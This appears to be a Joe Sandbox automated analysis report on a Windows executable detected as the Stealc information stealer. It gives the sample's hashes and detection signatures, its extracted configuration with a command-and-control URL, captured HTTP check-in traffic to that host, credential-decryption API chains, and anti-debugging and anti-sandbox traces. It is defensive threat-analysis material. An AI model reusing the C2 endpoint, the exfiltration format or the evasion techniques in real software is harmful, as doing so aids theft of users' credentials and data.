Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1543095
MD5:e1d69985ce8b4cb34d5ceca422eb15c3
SHA1:9382606ea46d759e13140c55d36ec6078c2186b1
SHA256:0409e35a5fd1f875e55f4f615cb7e31376177a9e2f06e41209576346e9a4d4f7
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6492 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E1D69985CE8B4CB34D5CECA422EB15C3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2191696889.0000000000D38000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2145893741.0000000004A40000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6492JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6492JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.80000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-27T08:52:06.786046+010020442431Malware Command and Control Activity Detected192.168.2.649710185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.80000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0008C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00087240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00087240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00089AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00089AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00089B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00089B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00098EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00098EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_000938B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00094910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00094910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0008DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0008E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0008ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00094570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00094570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0008DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0008BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00093EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00093EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0008F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000816D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49710 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBAFCFIJJJECBGIIJKHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 44 30 33 39 45 34 35 34 36 41 36 38 39 34 36 31 37 39 39 38 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 2d 2d 0d 0a Data Ascii: ------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="hwid"6D039E4546A6894617998------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="build"puma------EGCBAFCFIJJJECBGIIJK--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00084880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00084880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBAFCFIJJJECBGIIJKHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 44 30 33 39 45 34 35 34 36 41 36 38 39 34 36 31 37 39 39 38 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 2d 2d 0d 0a Data Ascii: ------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="hwid"6D039E4546A6894617998------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="build"puma------EGCBAFCFIJJJECBGIIJK--
                Source: file.exe, 00000000.00000002.2191696889.0000000000D1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.2191696889.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2191696889.0000000000D64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.2191696889.0000000000D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/R
                Source: file.exe, 00000000.00000002.2191696889.0000000000D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2191696889.0000000000D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php/
                Source: file.exe, 00000000.00000002.2191696889.0000000000D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php4Z
                Source: file.exe, 00000000.00000002.2191696889.0000000000D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpLZX
                Source: file.exe, 00000000.00000002.2191696889.0000000000D64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/g
                Source: file.exe, 00000000.00000002.2191696889.0000000000D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004508870_2_00450887
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0033512E0_2_0033512E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F41B30_2_004F41B3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042E2400_2_0042E240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045C3180_2_0045C318
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004433300_2_00443330
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004273C40_2_004273C4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00457BD80_2_00457BD8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00449CFB0_2_00449CFB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00453D5E0_2_00453D5E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045957D0_2_0045957D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045DD140_2_0045DD14
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003FE5460_2_003FE546
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003ED6980_2_003ED698
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038BF620_2_0038BF62
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00434F2E0_2_00434F2E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0039F7920_2_0039F792
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004557940_2_00455794
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0044B7AE0_2_0044B7AE
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 000845C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: cjjmoofv ZLIB complexity 0.9947171138242499
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00099600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00099600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00093720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00093720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\X77RWQ8W.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1828352 > 1048576
                Source: file.exeStatic PE information: Raw size of cjjmoofv is bigger than: 0x100000 < 0x198400

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.80000.0.unpack :EW;.rsrc :W;.idata :W; :EW;cjjmoofv:EW;pwxczyzg:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;cjjmoofv:EW;pwxczyzg:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00099860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00099860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cd137 should be: 0x1c05e6
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: cjjmoofv
                Source: file.exeStatic PE information: section name: pwxczyzg
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052405F push 6EF231CEh; mov dword ptr [esp], esp0_2_005240D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E905F push ebx; mov dword ptr [esp], 69747B5Fh0_2_004E908F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E905F push 73DBF815h; mov dword ptr [esp], edx0_2_004E9133
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055604D push esi; mov dword ptr [esp], eax0_2_00556061
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0046905A push 1CDDEEF1h; mov dword ptr [esp], ecx0_2_004691CF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0046905A push ecx; mov dword ptr [esp], esi0_2_00469666
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050204E push 456F5739h; mov dword ptr [esp], eax0_2_0050207C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050204E push 42EAC9B2h; mov dword ptr [esp], edi0_2_005020BE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C587F push 12FBED6Ah; mov dword ptr [esp], eax0_2_004C590F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F8878 push 779A3AE9h; mov dword ptr [esp], esp0_2_004F889E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0009B035 push ecx; ret 0_2_0009B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00538033 push 008AFF00h; mov dword ptr [esp], eax0_2_0053811E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00538033 push 0CB8F81Ch; mov dword ptr [esp], edi0_2_005381C2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F00C6 push 6AC9A5A0h; mov dword ptr [esp], eax0_2_004F00F3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0030509B push 1212F1F1h; mov dword ptr [esp], edx0_2_003050E4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0030509B push 38B8A364h; mov dword ptr [esp], esi0_2_00305195
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0030509B push edi; mov dword ptr [esp], ebp0_2_003051AE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00450887 push eax; mov dword ptr [esp], ebx0_2_004508BB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00450887 push 08C1F3A9h; mov dword ptr [esp], edi0_2_004508C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00450887 push 412A32A6h; mov dword ptr [esp], ebp0_2_00450918
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00450887 push esi; mov dword ptr [esp], 7DD960E7h0_2_0045091C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00450887 push 64194223h; mov dword ptr [esp], ebx0_2_0045093A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00450887 push edx; mov dword ptr [esp], eax0_2_00450A3B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00450887 push esi; mov dword ptr [esp], 11B20598h0_2_00450A65
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00450887 push ecx; mov dword ptr [esp], esi0_2_00450A78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00450887 push eax; mov dword ptr [esp], esi0_2_00450AB3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00450887 push 365B3979h; mov dword ptr [esp], ecx0_2_00450C1F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00450887 push ebp; mov dword ptr [esp], edx0_2_00450C4C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00450887 push edi; mov dword ptr [esp], 00000001h0_2_00450C53
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00450887 push 450F5CF0h; mov dword ptr [esp], esi0_2_00450C61
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00450887 push 4A946D9Ah; mov dword ptr [esp], ecx0_2_00450CD2
                Source: file.exeStatic PE information: section name: cjjmoofv entropy: 7.953081730798391

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00099860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00099860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13555
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4628CD second address: 4628F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jp 00007F25ED41A9FCh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007F25ED41A9F4h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 461C81 second address: 461CD0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F25EC6CB8F2h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jns 00007F25EC6CB8E6h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push ecx 0x00000019 jmp 00007F25EC6CB8F0h 0x0000001e pushad 0x0000001f popad 0x00000020 pop ecx 0x00000021 jmp 00007F25EC6CB8F3h 0x00000026 push ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 461CD0 second address: 461CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F25ED41A9E6h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 461CDE second address: 461CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 461E64 second address: 461E7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F25ED41A9EEh 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 461E7D second address: 461EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 js 00007F25EC6CB8EAh 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F25EC6CB8ECh 0x00000016 push eax 0x00000017 jbe 00007F25EC6CB8E6h 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 461EA8 second address: 461EC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25ED41A9F5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
